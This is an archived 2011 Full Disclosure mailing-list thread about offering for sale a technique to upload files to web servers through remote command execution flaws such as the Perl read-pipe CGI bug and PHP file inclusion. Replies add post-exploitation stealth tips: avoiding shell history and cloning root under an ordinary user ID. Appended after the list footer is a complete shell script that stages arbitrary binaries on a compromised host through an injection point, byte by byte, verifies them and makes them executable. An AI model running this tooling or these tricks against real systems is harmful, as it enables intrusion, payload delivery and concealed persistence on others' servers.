Full Disclosure mailing list archives

Re: New attack vector for sale, firewall bypass


From: ichib0d crane <themadichib0d () gmail com>
Date: Tue, 7 Jun 2011 14:10:20 -0700

Yeah, it's a bit like using screen to avoid 're-downloading' something
you find over a remote shell, using a different shell than bash as
part of an exploit so the history file is unset/obscure from the
get-go, adding specific root permissions to a specific user to clone
root under a 'legit' uid like 1003, etc. Just all situational tricks
simple enough to not bother with a whitepaper.

On Tue, Jun 7, 2011 at 1:25 PM, Dan Rosenberg <dan.j.rosenberg () gmail com> wrote:
On Tue, Jun 7, 2011 at 4:12 PM, Marshall Whittaker
<marshallwhittaker () gmail com> wrote:
Dan, did you come up with that on the spot or is there already a whitepaper
on it?

I haven't seen any whitepapers on this.  I think it's the sort of
thing that people just figure out when needed, or pull from their bag
of tricks.

-Dan

Anyway now that the cat's out of the bag...  See attached. :)  No more bids
please.  Dan was correct.

On Tue, Jun 7, 2011 at 9:38 AM, Dan Rosenberg <dan.j.rosenberg () gmail com>
wrote:

On Tue, Jun 7, 2011 at 6:19 AM, Marshall Whittaker
<marshallwhittaker () gmail com> wrote:
Hello,
I am willing to sell a new attack vector I have devised.  The proof of
concept code you will receive has the ability to arbitrarily upload files to
a webserver (tested on Apache), running Linux with the well-known Perl read
pipe vulnerability in many web CGI applications.  This issue can also be
leveraged through PHP LFI and RFI attacks, and through almost any other
remote command execution vulnerability.

If you have a remote command execution vulnerability, couldn't you
just leverage whatever useful binaries are available on the victim
machine (perl, python, echo) to simply copy your exploit/file/etc. to
disk by printing it byte-by-byte, possibly in pieces?  Did I ruin the
surprise?

-Dan



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
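Dan's point above, that a command-execution primitive already lets you recreate any file on the target by printing it byte-by-byte in pieces, as an added worked example that is not part of the thread or of anyone's attached code. It assumes a POSIX sh with printf, od, dd and cksum on the target, and it simulates the injection point with a local exec_remote function (an assumption of this example) standing in for the vulnerable CGI request.

```shell
#!/bin/sh
# Added example, not code from the thread: recreate an arbitrary binary on a
# host where all you have is command execution, by encoding it as printf
# octal escapes and sending it in pieces that each fit in one injected command.

# Stand-in for the injection point (an assumption of this example). In a real
# engagement this would wrap the HTTP request that carries the command, e.g.
# the tainted argument of a Perl open("... $input |"); here it runs the
# command locally so the whole flow can be exercised offline.
exec_remote() {
    sh -c "$1"
}

# Encode the bytes on stdin as one printf command that appends them to $1.
# od prints every byte as three octal digits; each gets a leading backslash so
# the target's printf reproduces it exactly, NUL and high bytes included. The
# result is printable ASCII only, so it survives URL encoding in a GET parameter.
# printf octal escapes are POSIX; echo -e and \x hex escapes are not.
encode_chunk() {
    esc=$(od -An -v -to1 | tr -s ' \n' '\n' | sed '/^$/d; s/^/\\/' | tr -d '\n')
    printf "printf '%s' >> '%s'" "$esc" "$1"
}

# Push local file $1 to remote path $2, $3 bytes per command (default 64).
# The destination is truncated first so a re-run does not double-append.
# Each byte costs four characters on the wire, so pick $3 to fit the
# request-size limit of the injection point.
upload_file() {
    src=$1; dst=$2; chunk=${3:-64}
    size=$(wc -c < "$src" | tr -d ' ')
    exec_remote ": > '$dst'"
    i=0
    while [ $((i * chunk)) -lt "$size" ]; do
        cmd=$(dd if="$src" bs="$chunk" skip="$i" count=1 2>/dev/null | encode_chunk "$dst")
        exec_remote "$cmd"
        i=$((i + 1))
    done
    # Verify with a checksum the target is likely to have: cksum is POSIX.
    # The remote value is fetched through the same primitive and compared
    # with the local one, which is exactly what you would do against a real host.
    [ "$(cksum < "$src")" = "$(exec_remote "cksum < '$dst'")" ]
}

# Self-check on constructed input: every byte value 0..255, so NUL, newline,
# quote, backslash and bytes >= 0x80 all have to survive the trip.
demo() {
    tmp=$(mktemp -d)
    i=0
    while [ $i -lt 256 ]; do
        printf "\\$(printf '%03o' "$i")"
        i=$((i + 1))
    done > "$tmp/payload.bin"
    upload_file "$tmp/payload.bin" "$tmp/uploaded.bin" 48
    status=$?
    rm -rf "$tmp"
    return $status
}

demo && echo "upload verified byte-for-byte"
```

Once the checksum matches, one more injected command (chmod +x on the destination) turns the uploaded bytes into something runnable. printf was chosen over echo because echo's escape handling differs between shells (dash's echo has no -e), and over perl/python because it is present even on minimal images; if printf is missing on a given target, the same chunking works with perl -e 'print pack(...)'.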

